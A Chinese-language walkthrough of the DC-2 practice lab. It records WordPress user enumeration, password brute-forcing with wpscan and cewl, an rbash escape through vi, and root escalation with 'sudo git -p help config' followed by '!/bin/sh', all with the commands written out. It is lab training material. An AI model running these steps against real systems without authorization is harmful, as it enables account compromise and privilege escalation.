DC-2 渗透记录

信息收集

kali ip地址为： 192.168.7.98

探测靶机，并对靶机进行扫描，扫描到开放80 对应Apache/2.4.10 、和7744端口对应 openssh6.7服务

漏洞分析及利用

首先对80端口访问

发现页面被重定向，没有dns记录，手动配置一下/etc/hosts

进入网站并发现flag1

Flag 1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

得到提示这里使用cwel

接着尝试对网站进行爆破，这里使用Drib工具

发现wp-admin类似敏感目录

访问发现web管理后台

用hydra工具尝试admin用户的弱口令，发现不对

经过小小的google之后，发现这里作者本意想让我们使用另一款wordpress工具wpscan

找到三个用户

1
2
3

admin
jerry
tom

继续使用wpscan工具指定用户进行密码爆破

匹配到 tom and jerry密码

尝试登录jerry账户，登陆成功，并发现Flag2

Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

查询其他的漏洞发现没了其他信息，使用tom账号登录也没有其他的信息。根据flag2提示回到漏洞利用阶段利用ssh服务

登录进入tom的账号
发现flag3.txt文件但是cat命令不能用

echo /home/tom/usr/bin/* 查看用户能用的命令,发现less、vi 都可以查看flag3

1 2	Flag3： Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

暗示我们向着jerry用户横向移动
这里需要进行 rbash绕过，有两种方法

使用vi进行绕过

：Set shell=/bin/sh
：shell
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
成功绕过

执行如下命令绕过

绕过成功，查看etc/passwd

发现jerry账户 su -l Jerry 切换账号

ls查看一下目录，发现flag4

Flag3：
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

进行finalflag的提取尝试切换root权限：

find / -perm -4000 -type f 2>/dev/null
发现at命令尝试提权
echo “/bin/sh <$(tty) >$(tty) 2>$(tty)” | sudo at now; tail -f /dev/null
“adipiscing”

失败
Mount提权同样失败

Sudo -l 发现git可绕过

在gtfobins查询绕过方法：

1 2	sudo git -p help config !/bin/sh

成功获取finalflag

DC-2 渗透总结

1、前台爆破，需要社工到用户名和密码

Wpscan ，cewl….
2、rbash 绕过
：Set shell=/bin/sh
：shell
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
3、git 提权
Sudo git -p help config
! /bin/sh